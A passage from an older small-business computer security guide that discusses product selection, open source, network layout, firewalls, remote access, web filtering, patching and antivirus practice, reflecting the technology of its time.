product around it undermines the security. Independent certification raises costs even further. If a product
28
is competing on price, features, and effectiveness, an effective product must sacrifice somewhere, and
features is a good place to cut since a simpler product is also easier to test.
A corrolary here is that a product which is priced well and has an array of features is probably not well
tested— the books have to balance. Many commodity software and hardware products are released well
before they are ready and are tested by consumers, with a steady stream of bug-fixes, security patches,
and driver updates. A disturbing trend is the number of such products, especially short-lived consumer
hardware, where the vendor does not even bother to fix the software problems, expecting the consumer to
just upgrade to the newest hardware. I have several such paperweights on my desk right now.
The prudent shopper, therefore, looks for the simplest products that will do the required job. Remember
that simple components working together make up a defense in depth (see the section called “Create a
Defense In Depth”). In many cases, you will find that the extra features are not needed and may just make
products harder to use and understand. Other than reading like something out of Mission Impossible, there
is no real advantage to a self-destructing memory stick versus one which merely uses strong encryption.
A self-destructing drive protects the data if the wrong password is entered; an encrypted drive, by being
simpler, also protects the data if the drive is taken apart.
Products which include security features like built-in encryption have historically been very weak (e.g.
zip-file or Word document encryption). Many times these features are an afterthought and are not given as
much attention as the rest of the system. The vendor may not even have the in-house expertise to do the job
right. It is therefore better to get simpler applications and use dedicated external tools to provide security.
This also offers the option of changing those tools if you find that they do not suit your needs. On the other
hand, integrated security features are easy and convenient; it is much easier to check a box saying “encrypt
this” then to remember to run an extra program. The best of both worlds may be applications which provide
a framework for 3rd party plugins so that the “encrypt this” checkbox runs the tool of your choice. As an
example, Firefox does not have built-in anti-phishing protection, but I know of at least three Firefox add-
ons which do and have chosen one I find useful. I also use a 3rd party plugin to provide encryption in
the Macintosh Mail application I use. The applications and plugins remain simple and dedicated to their
tasks while retaining convenience.
Look for products that have been audited by independent labs, have in-depth security reviews, or feedback
by security professionals. This will necessarily steer you away from the newest whiz-bang technology and
toward the cars that have a good track record and high resale value. It is often better to let others blaze
the trail and simply learn from their mistakes.
Take statistics-based security reviews with a spoonful of salt (“X product had 79 vulnerabilities last year,
while Y product had 32. Y is more secure.”). Statistics can be twisted to serve almost any purpose and that
class of report is often highly slanted: How serious were the reported problems? How many were actually
exploited? Were the problems self-reported or independently found? Do the numbers include bundled
software? How fast were serious versus minor problems fixed? What counts as a separate vulnerability?
etc. These reports can provide useful insights, but, unless you have time to check all of the underlying
assumptions, be wary of them.
Favor products that implement or use standards compliant technology. From a security standpoint alone,
this yields several advantages: peer review, group control, interoperability. I have harped on peer review
quite a bit. Group control gives the business a chance to participate in the process (if necessary or desired),
and protects the competition needed to make interoperability meaningful. Interoperability is critical from
two directions.
First, interoperability allows customers to switch tracks if one product or technology fails to meet their
needs. If a database system is found to be insecure and cannot (or will not) be fixed, you must be able to
get your data out of it and into another product. You must also, with as little disruption as necessary, get
a new database product to fit into your IT structure, such as an online ordering sytem. If a customer has
no real ability to do this, then a vendor has no pressing need to test their product, offer timely support,
compete over price, or virtually anything else.
29
With a de-facto standard, the definition of the technology is not written down and is only really understood
by the primary vendor. Whenever a competitor gets close to figuring out how it works, the vendor simply
makes slight changes in the technology in order to break competing products; while good for the vendor,
it is never good for the customer. Microsoft Word™ is the classic example of this kind of practice.
Second, without interoperability, a monoculture may develop. A monoculture is a situation where

everyone's defenses are identical to everyone else's, in this case because they are all running the same
software. An attack which works on one system works just as well on any other, and infections spread
very quickly— resulting in the Irish Potato Famine or the current situation with Internet worms. With
standards in place and marketplace competition, different businesses have somewhat different software.
The software is interoperable, but is unlikely to have the exact same problems. One of the reasons that
Linux systems, for instance, are not as vulnerable to attacks is because of different distributions (“flavors”)
of Linux. Linux systems are just different enough that an attacker must treat them individually rather than
launching fully automated attacks. This is not to suggest that every business can drop Windows and use
alternative systems (or even that this is entirely desirable), but it is food for thought: sometimes change is
good and sometimes just the clear threat of alternatives can force vendors into line.
One place where standards compliance is starting to change the nature of threats is with Internet browsing.
The increase in market share of non-Internet Explorer browsers (e.g. Firefox, Safari, Opera, etc.) is
encouraging web designers to make their pages work with more than one browser. Businesses are better
protected because Firefox users are immune to IE-specific threats and vice-versa. As the numbers continue
to change, attackers have to work harder to affect the same numbers of people and increased competition
is driving all of the web browsers to improve.
The Limits of Detection, Repair, and Forensics Software

This discussion deserves its own section just because it concerns claims often made by product vendors and
generally misunderstood by customers. I touched on this issue in the section called “An Incident Response
Plan” when discussing forensics. Specifically, there are clear limits to what malware detection, repair, and
forensics software (even hardware) can do. Specifically, once a system has been compromised, that is, an
attacker has gained administrative access, then, by definition, you no longer control that system.
Caution
Once an attacker controls a system, no information from it and no operation on it, including the
functioning of any security software, can be entirely trusted, no matter how simple the problem
appears to be. The only safe course is to boot a safe copy of the operating system and system
files, preferably from unwritable media.
Essentially, administrative control of an operating system allows the attacker to change reality. They can
alter system files, device drivers, security settings, etc., limited only by their imagination. They can force
file browsers, virus scanners, or intrusion detection systems to see only what they are allowed to see. Sure,
in many cases, simple viruses will not go to these lengths, but attacks are becoming more sophisticated,
and it is quite possible for an attacker to offer up a red herring to a repair program while keeping the
real danger hidden. Recent discoveries have demonstrated ways to hide in “safe” parts of Windows Vista
designed to prevent users from copying copyrighted files (DRM). Ways have even been discovered to hide
from hardware-based memory scanner [Higgins-2007].
Network-based scanning and forensics software has even more difficulties, specifically software designed
to analyze a system to determine if it complies with security policies (anti-virus software, current OS
updates, etc.), and software used to remotely diagnose problems. These products can be actively dangerous
if they are allowed to generate a sense of complacency. This category of software relies on support from
the local machine. If the machine is hijacked, it is not difficult for the attacker to answer “Yes, I'm fine.” to
any question asked of it. It is like screening someone at an airport by asking, “Are you carrying a bomb?”
30
That is not to say that these categories of software are entirely useless, just that their use falls quite short
of their marketting descriptions. Further, their shortcomings are not due to flaws in their manufacturing;
they are fundamental to the nature of the tool. Network analysis tools can catch accidental mistakes, like
forgetting to update a machine or plugging a foreign laptop into the network. When they detect a problem,
such as an infection, the results can be depended on insofar as a problem really exists. Tools can be set
up to automatically page administrators or quarantine dangerous PCs. They cannot be depended on to
correctly identify an infection, remotely repair a compromised system, or locate a clever attacker, and must
be backed up by regular direct examinations of the individual machines.
Part of the reason for their popularity is that a true remote solution to the problem would be a tremendous
time and money saver, allowing much greater centralization of support resources, earlier detection times,
and faster incident response. In practice, however, the solutions are just not workable.
Similarly, forensic tools run on the local machine can provide useful information as long as it is clearly
understood that the attacker is calling the shots and time can be dedicated to unravelling layers of deception.
On the other hand, most businesses can probably do just as well by making a safe copy of the disk and
leaving it to dedicated security experts with the tools, techniques, and expertise to perform that kind of
analysis. Meanwhile, wiping and reinstalling (despite its implications for downtime) is the safest repair
technique. Downtime can be reduced if a spare of a critical system can be set and ready to go. Then you just
have to transfer data. Imaging and restoration software is also a great help. If you are restoring documents
that can contain macros or scripts to a system that was infected (e.g. Office documents), be sure to scan
them for viruses first or you may have to do it again.
Freeware versus Open Source

Here we discuss a bit about the differences between “Freeware” and open source software (which is
sometimes called “Free Software”. This can be confusing and has implications for security.
Freeware is often blamed for security problems, and rightly so. Freeware, as used here, includes a whole
host of downloadable gizmos, games, and gadgets which many computer users cannot resist. Some of
these programs are actually free and some of them start out free then request payment in some fashion
(after a time period, to access more features, to remove advertisements, etc: “shareware”). Many of these
programs are advertisement supported and are essentially the source of much adware, spyware, trojan
horses, and so forth. There are good and useful programs in the mix as well, but finding them takes some
detective work. Spyware programs attempt to detect the bad apples but require constant updates to keep
up with new problems.
Open source, which has been called “Free Software” at times, is a very different beast. The Free Software
moniker has been explained as “Free as in Freedom, not Free as in beer”, referring to the ability to view
and share source code, but due to confusion with Freeware, open source has become the preferred term.
Open source is a type of software that is developed by a group effort, consisting of some mix of individuals,
companies, non-profit foundations, and government organizations. These groups contribute time, money,
equipment, and direction to the project in return for free access to the product. Open source products of
one sort or another underlie much of the structure of the Internet, such as the Domain Name Service (DNS)
backbone, most of the Internet web and mail services. Commercial products are sometimes hybrids of open
and closed source: Apple's OS X runs on top of the free BSD UNIX operating system, LinkSys™ uses the
free Linux operating system in many of its consumer router products, as does Tivo™ in its personal video
recorder, and even Microsoft uses BSD code in its Windows networking stack.
Contrary to many opponents of open source (generally companies facing competition from open source
products), project development tends to be a very controlled process where changes are carefully approved
and anyone can view both the current state and the complete history at any time. This makes sneaking
in deliberate backdoors very difficult and often makes finding and removing security holes an easy
process. Contrary to many open source zealots, open source is not universally better. There are many
more open source products in existence than closed source, and many are of poor quality or have
31
languished because of lack of interest. In these cases, progress is slow and fixes to problems may not
happen. Sometimes commercial products are better designed because they benefit from a single point of
view instead of degenerating into arguments about different approaches. Open source often approaches
problems differently than common products and there can be a significant learning curve. In general,
however, open source processes do quite well for most purposes and the projects which survive are of very
high quality. The availability of source code drives competition for support contracts or customization.
Sometimes you will find that alternative products approach things differently because a different way is
actually safer and more efficient for some users.
In any case, I would seldom recommend that a company “take the plunge” unless their is a significant
business need, but slow incorporation of open source products, especially at the server level, can reduce
costs, open opportunities, and reduce vendor lock-in.
As an aside, I myself hated UNIX/Linux until one point in college where I forced myself to use it
exclusively for three weeks: writing papers, email, and so forth. Once I got an idea why the system worked
the way it did (there was no OpenOffice back then and UNIX was designed at a university level with an
emphasis on scientific and technical writing), it gave me a lot of insight into different ways to approach
even tasks as mundane as office work. Those insights still serve me today as I write a large technical
document on a system (Apple OS X) with UNIX underpinnings. Different tools for different jobs.
Your Network Layout

In this section, we describe common components of a business network and how they relate to security. If
you have a very small business and few computers, one component may do double duty and take the place
of several others; we will discuss this where appropriate. Figure 1, “Network Layout” shows common
network components.
Figure 1. Network Layout
32
Network Components
Internet. The Internet is often pictured as a cloud because the protocols it uses are designed to
not care about how they get from point A to point B. If you are in California sending data to New
York, it might go by way of Illinois, Texas, or anywhere in between. This makes the Internet highly
resilliant in the face of network failures, but it also means you have little or no control over your data
once it leaves your own network. Encryption technologies, such as SSL in web browsers, helps to
protect your data as it crosses the great unknown.
Internet Clients. Somewhere out there are PCs owned by your clients and customers which need
access to your services, such as your company website, online store, or real estate database. Some of
these PCs may have been compromised by viruses or hackers; some of them may be hackers. Your
challenge is to protect yourself and your users from fraud while still making your services easy and
convenient to use.
Internet Servers. Also out there in the cloud are the Internet services your business uses, such
as vendor websites, email from business partners, and so forth. Perhaps your own web site, email,
or other services are hosted on a third party server. As with customer PCs, 3rd party services may
be illegitimate or may have been taken over by the bad guys, so the benefit of outside services is
always balanced by some element of risk.
Router/Firewall. A router connects one network to another. A router is like the on/off ramp to a
highway. It connects a collection of local roads to a public expressway. Routers form the interchanges
and junctions which allow data to find its way across the world.
A large organization may have several routers connecting different sections of its network. A small
organization generally only has one, connecting its internal network, or Intranet, to the Internet. Most
routers designed to connect to the Internet contain security software to deny unwanted traffic and
protect the local network; this is called a firewall, or specifically, a hardware firewall. The firewall
is your first line of defence against the outside world. A firewall may be included in other consumer
network products such as DSL Modems and wireless access points, but products vary greatly in
sophistication and quality.
DMZ Servers. The DMZ or Demilitarized Zone is an area in between the internal network and
the outside world. The term refers to the land-mined stretch of land between North and South Korea.
The DMZ is a dangerous in-between space used to house the services, such as web sites and email,
your network provides to the Internet at large. Simple firewalls may only allow a single computer in
the DMZ, a DMZ Host, and provide no protection to it at all. Higher end firewalls support an entire
network of servers and can provide them with configurable protections from attack; note that PCI
DSS requires specific protections for DMZ servers [PciSsc-2006 § 1.3)].
PCs. Of course, your network contains PCs, where your employees actually do their work.
Although your PCs are protected by a firewall (you do have a firewall, don't you?) from direct attack,
PCs are often used to connect to services on the Internet such as web pages and email and bring
things back with them, including viruses and the aptly named trojan horse programs. In addition,
PCs, in the hands of a shady employee, can be a source of attack themselves. Lastly, PCs, especially
laptops, can be stolen with all of their data.
PCs can also mount a battery of defensive software, including virus and spyware detectors, their own,
software-based, firewalls, layers of roles and permissions in the operating system, and document
encryption.
Intranet Services. Besides PCs, you probably have some servers, PCs, or devices that provide
services to the inside of your network, such as some shared files or maybe a printer. Consumer
products such as printers or hard drives that simply plug into a network have come a long way, so
even small shops may have network servers without even thinking of the computer inside. Larger
business may have shared databases and applications for payroll, accounting, claims processing,
etc. Protecting shared resources, especially those containing confidential data, is important. Many
networks also have some system for centralized storage of usernames and passwords, determining
who is allowed on the network and who is not.
33
Dialup or Remote Employees. Many businesses provide some way for employees to connect
to the business network from home or while on the road. Sometimes this is a convenience for
telecommuters, and sometimes it is a necessity for travelling sales staff or for on-call technical staff
who need to troubleshoot problems from remote. Sometimes this is dialup, Virtual Private Network
(VPN), or products like GotoMyPC™12. Sometimes it happens without the company's knowledge.
At several large organizations where I have contracted, the IT staff found and removed illicit dialup
connections on a regular basis. gotomypc creeps into companies under the radar.
Remote connection can be a productivity boost, but it also presents problems because it allows a
potentially compromised employee PC to connect to the inside of your network and spread viruses,
not to mention that a virus-infected PC will probably report the employee's password to its controller.
Sneakernet. Toting disks back and forth, often affectionately called sneakernet, is another way for
data to get out of your business and for viruses to get in. Unfortunately, employees will often resort
to it if remote connections (e.g. dialup) are not allowed or other security restrictions are too tight.
Disks, USB drives, and whatnot are easily misplaced or stolen. USB drives with built-in encryption
can reduce the danger of lost or stolen devices.
Wireless Access Points. Wireless networking, Wi-Fi™ or Airport™ networks are a very
convenient way to link computers and peripherals like printers. No wiring has to be run and devices
can be freely moved around, which is especially convenient for laptops. On the other side, wireless
traffic can be snooped on and wireless networks can be broken into more easily than getting through
a firewall, so caution is in order [Lemos-2007b]. For laptops with wireless support (or bluetooth®,
a similar technology for connecting keyboards, phones, and so forth) your computer can be hijacked
when you are in a public place, such as a cafe or hotel lounge, unless you protect yourself.
WEP, the encryption used in first-generation wireless networking equipment, has been cracked and is
essentially useless. You should (and may be required to) either upgrade old equipment to something
that supports WPA or WPA2, or rearrange your network so that it does not depend on the security
of the encryption (see the section called “Disappearing Boundaries”) [TewsEtAl-2007, PciSsc-2006
§ 4.1.1].
As mentioned above, some networks may be much simpler than this, especially for SOHO workers,
telecommuters, or sattelite offices. Figure 2, “SOHO Network Layout” shows a different setup, much
closer to what my own home office looks like.
34
Figure 2. SOHO Network Layout
, , : Internet, Internet Clients, and Internet Servers have not changed from the previous
example. The changes are explained below.
SOHO Network Components

Wireless Access Point. A combined wireless access point, firewall, and print server, such as the
Apple Airport Base Station, or any number of products from Linksys™, D-Link™, etc. Many of
these have one or more wired network ports as well as the wireless capability. Shown here, the printer
would be connected to a USB port on the access point, the main PC and Internet service by network
cables. Remember to change the default administration password as soon as you get your device.
Hosting Provider. In this example, there is no DMZ, and no services are provided by the local
network. Instead, there is a web hosting provider who provides email, domain registration, and a web
site. In all likelihood, there are many businesses with web sites and email all running on the same
remote server (“shared hosting” as opposed to “dedicated hosting” which is more reliable and secure
but much more expensive). The web site may be an e-commerce site or it may just be informational,
with the business doing its sales directly, through e-bay, an online contract brokerage, or some other
venue. This network may also have a dial-in or VPN connection to a larger corporate network, or
perhaps several for an independent contractor.
Office PC. This is the main PC of the office. It is the newest and fastest computer and has a good
deal of storage. Files are shared to the network, and a CD/DVD burner is used for backups.
Wireless PC. One or more PCs, some of them may be laptops, connect to the network wirelessly.
Wireless technology is becoming a popular choice in homes and especially rented space where it
avoids unsightly cables or punching through drywall to connect computers. Maybe you have an older
PC in a back room. Maybe your spouse does the books on the bedroom PC. Perhaps you sit on the
table and work with your laptop. The wireless computers use the shared storage from the main PC
and the printer shared from the wireless access point.
35
One problem we are all guilty of in home office situations is that one or more machines may be used for
both home and business purposes. You or your family members may play games, store music and photos,
watch movies, do school work, or just keep up with email on the same computer. This type of mixing
endangers business data; you are likely to visit more sites, come into contact with more programs, and
have lowered defences when working with personal things and a security problem can compromise your
business too. Sometimes, we do not have enough spare cash or space to separate everything out properly.
There are, however, some things that can make it safer.
If you do not have space for another real computer, get a virtual one. Products like VMWare™13 or
Virtual PC™14 let you run another copy of your OS on top of your real computer, like a computer in a
window. This can let you separate one world from another and keep security problems on one side from
endangering everything else. Failing that, create separate accounts (user names) for everyone who uses
the computer and, preferably, a separate account for business work. This makes it harder, for instance, for
a security problem in your web browser while checking out the latest NBA stats from scooping up your
latest sales report. Lastly, encrypt your business data. I will talk about this in the section called “Protecting
Documents”.
A shared hosting site can be a security risk. Because your hosting provider uses the same server to handle
more than one client's email and web site (often several hundred on one computer), a security problem
with one client can spill over and affect others. It also means that a simple hard drive failure will take
hundreds of sites down at one go. Do not store confidential data on your web host longer than you need to
and back your web site up frequently. Encrypting confidential email is probably a good bet as well. Take
care when accessing your web host: always make sure that SSL encryption is working in your browser
and if you use FTP to move files back and forth, ask your service provider how to use a secure connection
like SSH (Putty15 is a common Windows program).(20070429 emv) FIXME: Put reference here to later
discussion on change control.
The Network Perimiter

The Front Gate - Firewalls and Routers
The firewall is your first line of defense. It is set up to only allow certain traffic in or out. In most office
environments, no one in the outside world should be allowed to contact your desktop machines (a "deny-
all" firewall). Any attempts to connect to them are turned away. Business systems that have to interact
with the outside world like a web or mail server (assuming you host your own) need special rules and
are placed in a special area called a DMZ. The DMZ is a dangerous space in-between your network and
the hostile outside world.
Your desktop machines are allowed to contact outside services, such as websites or email, but they must
also get information back. When you open a web page, your browser sends a request to the web site.
This establishes a connection between your computer and the web server. When your firewall receives the
request from your computer, it passes it on to the web server, but first, it writes it down in a table. The
web server receives the request, looks up the correct page and sends back a response. When the response
comes back, the firewall checks to see if there is a valid connection between your computer and the web
site. Only data which was actually requested is allowed to come back through. Once the request comes
back, the connection is broken16.
Firewalls are often configured to let any connection out and all requested data back in. There are many
reasons, however, to restrict outgoing traffic to just what your employees really need to do their work.
13
http://www.vmware.com/
14
http://www.microsoft.com/windows/virtualpc/
15
http://www.chiark.greenend.org.uk/~sgtatham/putty/
16
This is called “stateful packet inspection” and, although this is the way that firewalls should be set up, consumer hardware may not be capable
of it or may need custom settings to do it properly.
36
Network services like web and email are associated with numbered ports. Ports are just what they sound
like: a hole in a particular spot to let things pass in and out. Every time data goes through your firewall in
either direction, you poke a small hole through your defenses, like opening the gate in a castle. It is aways
possible that the soldier coming in could be an intruder in a stolen uniform or that the person going out is an
escaped prisoner. Some services, particularly those using a protocol called UDP, make it particularly hard
to sort out what incoming data was really requested and what was not. By limiting the number of openings,
telling the firewall which ports can be opened and which are nailed shut, you limit your exposure.
Another reason to limit outgoing data is a component of a defense in depth. Once an intruder gets into
your network, they will need to get data back out unnoticed. Malware will often try to send bulk mail.
By limiting your employees to sending email through your own mail system, you stop these programs
from functioning. The remote control software which makes zombies work uses something called Internet
Relay Chat (IRC). Denying the use of IRC prevents zombies from phoning home. By limiting an attacker's
options you make their jobs harder and their failed attempts may be noticed.
A balance must be struck between protecting your network and allowing your employees to use convenient
tools. I have often used tools to send email to my pager to notify me of problems or tell me when long
jobs completed. Blocking outgoing email (without providing an alternative) would have interfered with
my (atypical) duties. Finding the correct balance is often a process of trial and error.
The Back Door - Employees On the Go

The firewall works great when employees work at the office behind its protection. It can be a severe
nuisance when an employee is working at home or on travel and needs to access email and business files. A
number of solutions exist for allowing employees access to the inside of the network from another location,
including dial-up, Virtual Private Network (VPN), and products like GotoMyPC™. These technologies
have varying levels of protection, some of which can be quite good, but they all open holes in your network
which might be exploited by bad guys and they all let an unprotected and possibly infected computer
connect to the inside of your network. Sometimes this kind of connection cannot be avoided, such as
when an employee needs remote access to a mainframe, factory automation system, system administration,
or custom network services that cannot be done any other way. Remote access should never be granted
without some thought, however, and other means to access documents and email should be considered
as well.
Instead of letting employees in, it is also possible to move the data out: to a server in your DMZ, or further,
to a vendor's server. Email is easily solved with webmail systems or with a technology called IMAP,
which, unlike traditional POP accounts, leaves all email, including user-created folders, on the server to
be accessed from anywhere. Remote email can and should be secured using SSL, the same technology
which protects online shopping sites; otherwise, it is trivial for others to snoop. Documents can be stored
using Content Management Systems (CMS) which allow employees to upload, download, edit, and share
documents. A new service called Google Apps™17 even provides web-based office tools so that remote
employees do not need office applications.
Of course, nothing comes without trade-offs. By moving data out, you remove the protection of your
firewall and expose it to attack. If you use a vendor's service to store documents, you are completely
dependent on them for security, backup, and so forth. A reputable vendor with a good track record,
however, may have the resources and expertise to do a better job at security than you can. Make certain
you can get your documents back and move them to another vendor if you need to.
Another advantage to moving shared data out is that you can separate your data into sensitive and non-
sensitive. Most of your day to day business documents would probably do you less harm if lost or stolen.
Many real-estate companies these days publish their current listings on the web, so there is hardly a reason
to protect the databases sent to agents in the field. Some documents, on the other hand, would be hard
to replace and would be of great interest to others. Perhaps they contain proposals, business plans, legal
17
http://www.google.com/a/
37
advice, research data, etc. Perhaps you handle confidential data such as medical information or trade secrets
for someone else. Whatever it is, your sensitive documents deserve an extra level of protection. You can
achieve this by moving your non-sensitive data to an outside accessible system and leaving your sensitive
data inside the firewall. If, for some reason, someone needs a copy of an important document, you can
make it accessible just once, then remove it immediately.
Tip
All your security is worthless if you let the data walk out the door.
Which leads me to another point about employees working from home: If you handle sensitive data for
someone else, don't let them do it. Period. The news is full of stories (e.g. [Lazarus-2006]) of laptops or CDs
being stolen from work-at-home employees with thousands or even hundreds of thousands of confidential
records. This is in the news now, but it is not a new problem. If you must transfer confidential data, encrypt
it. There are a number of tools for protecting data on stolen computers or for encrypting portable drives,
but they are not perfect, so it is best that they not be stolen.
Controlling Web Sites

Another decision often made at the Firewall level is whether to block particular web sites. This is often
done to enforce company policies on inappropriate use of the Internet such as preventing employees from
viewing or searching for obscene pictures. Another purpose can be to block sites which have been listed
as illegitimate or dangerous in online databases. Blocking inappropriate web use can sometimes have a
dramatic effect on reducing network bandwidth use.
Data archiving policies may also lead you to blocking external email services like Hotmail and Gmail
in order to prevent employees from using personal email for businesss communications. If an employee
discusses a financial transaction or a personnel problem using a personal email service, for instance, you
may not be able to provide that email in response to a subpoena. In addition, use of personal email for a
business communication can bypass any security measures you have in place to protect business email.
Personal email use at work has both advantages and disadvantages; while being a potential distraction, it
may be less of a distraction to others than use of an office phone for personal business. Additionally, forcing
employees to always use official email may create confusion as to when an employee is communicating
officially and when they are not; an employee would not use company letterhead to send a letter to their
child's school, and they should not use a company email address for that purpose either. In many cases, I
have seen companies deal with this by having the employee place a clear disclaimer in an email that they
are speaking in a personal capacity. In the end, which approach you take may not matter as much as having
a clear policy which is consistently enforced. The recent argument over emails in the Department of Justice
attorney firing scandal indicates that White House policy on email use is neither clear nor consistent and
it has gotten them in trouble regardless of underlying issues [Rasch-2007].
Web site blocking can stop casual viewers but has limitations. New sites are added all the time, so no
blocking list can ever be complete. Innocent sites often end up in blocking lists by mistake. Certain users
often have particular needs to access specific blocked sites; your HR employees and your nursing staff are
probably looking for very different things when they search for "breast". There are several web services
which help users bypass web blockers, which must themselves be blocked. It must be understood that
maintaining the block list will be an ongoing task, but the mere attempt may be enough to establish a
consistent policy for purposes of disciplining employees who deliberately violate it.
No Trespassing
Just like "No Trespassing" or "Authorized Personnel Only" signs in and around your business property,
public and private computer resources should also be identified. Prominent warnings should be placed
on private computing resources, such as internal web sites and computer login screens. Confidential or
38
restricted access materials should be clearly identified. These warnings should refer to company policies
on appropriate computer use and are also great places to put important announcements. By making these
notices prominent, the ignorance defense becomes untenable.
Disappearing Boundaries
Due to the increasing interconnectedness of our online business dealings, the boundaries of the corporate
network are nowhere near as clear as they used to be. Telecommuters connecting from home or the road,
wireless access, contractor laptops, PDAs, offsite service-personnel, and so forth, mean that a business
network may have almost as many doors as walls. Any of these doors can be a potential entry point for an
intruder or an infection, or a potential way for confidential documents to leave.
A hostile computer on a local network can do much damage. First of all, they can snoop on any unencrypted
communications, even capturing passwords to network services. Secondly, they can play a very old trick
called a man-in-the-middle attack by pretending to be a trusted server and stealing confidential data even
from encrypted connections. This is related to phishing and is a technique commonly used by phishers
when users are expecting to connect to secure sites. Most people are familiar with the idea of providing a
username and password to identify themselves to a service, such as a website or email provider. Prior to
the recent phishing scams, few people have given thought to making sure the service provider is who they
claim to be. We will see more applications supporting this kind of validation and making failures more
obvious to users as time goes on, but users must also learn to be suspicious about who they are giving
their information to.
As these changes occur, there are different opinions on how to best adjust the network and keep it safe.
In the end, much of it will depend on the needs of the business. Some of the solutions entail moving non-
sensitive data out of the firewall (discussed in the section called “The Back Door - Employees On the
Go”), moving untrusted connections (e.g. wireless) and computers (contractors) out of the firewall or to a
special part of the network, and beefing up the defenses of all the individual PCs and servers (trust-nothing
systems). This problem and its solutions are well discussed in the Information Security Forum's Report,
The Disappearance of the Network Boundary ([Isf-2005b]).
In essence, by moving wireless connections or untrusted computers outside the firewall or to a special
restricted zone inside the network, you can limit these PCs to accessing specific services and specific,
more secure, applications. As an example, you can force laptops using outdated wireless cards and faulty
encryption (WEP) to use only services which use their own encryption by simply denying them access to
anything else. Contractors can be allowed to connect to only those services which allow them to perform
their specific tasks, browse allowed websites, check their email and nothing more. Viruses they may carry
in stay on their own PCs.
Setups like this can be created using an additional hardware firewall used to connect your untrusted network
to your main business systems. Newer firewall equipment can create multiple network zones with different
restrictions and the same effect can be had with a UNIX/Linux/BSD system, multiple network cards, and
customized firewall settings (not for the faint of heart). Eventually, tools to do this will be commonplace.
In all cases, the changes in network boundaries force us to beef up local defenses and more seriously
consider a defense-in-depth, including encryption of all network traffic, even locally.
Employee PCs - The IT Battleground

Installing Programs
Inside the network, there are, of course, employee computers. Depending on what type of business you
have and how big it is, you may also have file servers, network printers, point-of-sale terminals, automated
paint mixers, and what have you. Because there is such an unbelievable variety of networks, we have no
choice but to gloss over much of the detail.
39
The employee's computer or "workstation" has been a source of contention since the first days of its
existence. The very term, which should perhaps be "employer's computer" typifies the conflict. Employees
always want more; employers are (or should be) trying to reign in abuses and hold on to their tenuous
control.
The problem is that today's personal computers, which are primarily Windows systems, make it very easy
for the user to not only move data around, but also programs which change the way the system works.
These programs have complete control over the computer, and if they contain malware, such as virus, they
can spread like wildfire. Nowadays, even documents, such as email or spreadsheets, can contain programs
("macros") which can infect a system. Application security settings will block some of these attacks, but
when security gets in the way of what a user wants to do, they will happily disable it. It is common for
programs or websites to instruct users to disable security settings in order to get a feature to work. Because
technology has changed so quickly, most computer users simply have no way of knowing what actions are
safe and what are not. When they are risking their own PC at home, it is one matter. When their actions
can disrupt a corporate network, it is another.
Another issue is with corporate help desks. The more the employee changes the computer, the less they
will be able to get help. The helpdesk support or local IT person simply has no way of understanding
how the system has been changed, what may be causing the problem, and how to undo it. Applications
on Windows very often interfere with each other. In a large company I worked with it would take months
of testing for them to add applications to their PC desktops in order to sort out problems with all of their
other required applications.
Besides exposing a PC to malware, employees who install programs can open a company up to licensing
issues and liability. A program you bought one copy of for a special task may spread around the network.
Users may bring in software they use at home and install it on a company PC. Users may download and
install pirated software. A surprise BSA audit can lead to substantial fines.
UNIX™, a traditional business operating system, and PC systems derived from it, like Linux™ and Mac
OS X™, have a decades-old and well tested multi-level security which allows an administrator to set
up the computer and restrict what a user can do with it. Microsoft introduced a similar system with
Windows NT™ and its security has been improving in recent years. In fact, Windows Group Policies,
setting permissions for groups of users on a network and enforcing them on individual PCs, is a powerful
tool in large companies. Even when the same person owns and uses the computer, setting up a separate
administrator and user account limits the amount of damage that a virus can do.
An alternative or addition to locking down systems is the use of virtual machines or imaging software
which can quickly restore the state of the system to some earlier point. When a user makes a change
and the system stops working, the system is reset and the change is wiped out. This can be especially
useful when the employee has a legitimate need for more freedom (such as testing out new software). The
downside is that, if they do not carefully back up their documents, they will be lost on every reset. This
works particularly well in lab settings where users have network home directories; all of their files are
saved elsewhere and the workstations themselves are expendable.
As with many security issues, you must strike a balance between protecting your network and letting
employees customize their tools. Different people work and organize in different ways, and sometimes
using a different tool can make large productivity gains for particular people, especially if they are building
on prior experience. Having a selection of approved options and knowing when to make exceptions can
go a long way.
Security Fixes
It seems that there is a constant stream of security holes and bug fixes which need to be downloaded and
applied. Not installing patches in a timely manner exposes your systems to unwarranted risk and most
systems (Windows™, Linux™, Macintosh™, etc) have automated systems for downloading new updates.
Many serious virus outbreaks attack systems which should have been patched.
40
On the other side, new patches sometimes break things, especially if you have a complicated software
setup. Large companies generally solve this problem by having a test machine which is updated first. If
the test machine works, the rest of the PCs can be updated. Regular backups make it easier to undo a bad
update as well.
A very common but largely unreported problem with small business and home users is how to safely set
up a new PC. I recently helped to set up a new machine which came with Windows XP Service Pack 2
(released in 2004). There have been hundreds of security patches for Windows XP since that time. A new
PC connected to the Internet without those updates can be broken into within minutes, much less time
than it takes to download all of the new software required to protect it. Microsoft provides tools for large
companies to centrally manage updates without connecting to the Internet, but small businesses are out of
luck. Apple allows you to download all of their latest patches on one computer, put them on a disk and
move them to the new computer without connecting the new computer to the network. With Windows, I
had to use an obscure third-party tool18 to accomplish this.
Virus and Spyware Detection

For Windows PCs, anti-virus and spyware protection programs are simply required. They are primarily
designed to find malicious programs once they are on your system, but some also catch incoming viruses
in emails and downloads before they can do damage. Once a virus is on your computer, these tools provide
options to try to remove them. Unfortunately, the only completely safe method of removing an infection
is to reinstall the system and it is a good idea to keep good backups of your documents.
For non-Windows systems, like Macintosh and Linux, viruses do not exist and spyware is rare. This is
partly due to lower market share making them less valuable targets and partly due to security conscious
design making them more difficult targets, but there is no reason why malware may not become a problem
in the future. I run anti-virus software on my Macintosh computer primarily to keep from sending viruses
to Windows users by accident.
Malware detectors are useless without constant updates. They can only detect problem programs once a
security researcher detects them "in the wild" and adds them to a list. There are a number of products out
there, a couple of which are completely free and of good quality.
Software Firewalls
Controlling the changes a user can make to the computer is one way of limiting the spread of infections or
security violations. Another is to try to prevent infections from getting off the computer. Individual PCs
can run their own firewall called a software firewall. Like a hardware firewall, a software firewall limits
what traffic can get in and out and adds an additional layer of protection. Software firewalls slow down the
spread of viruses inside your network, make it harder for attackers who have compromised one computer
to attack another, and make it more difficult for spyware to phone home. If a PC is badly compromised,
an attacker will simply turn the firewall off, so the protection is not absolute.
Windows PCs since XP™ Service Pack 2, Macintosh computers with OS X, and any recent Linux or UNIX
systems all come with software firewalls. There are commercial packages for Windows XP which replace
the substandard built-in firewall. Businesses with Macintosh systems will likely want to spend some effort
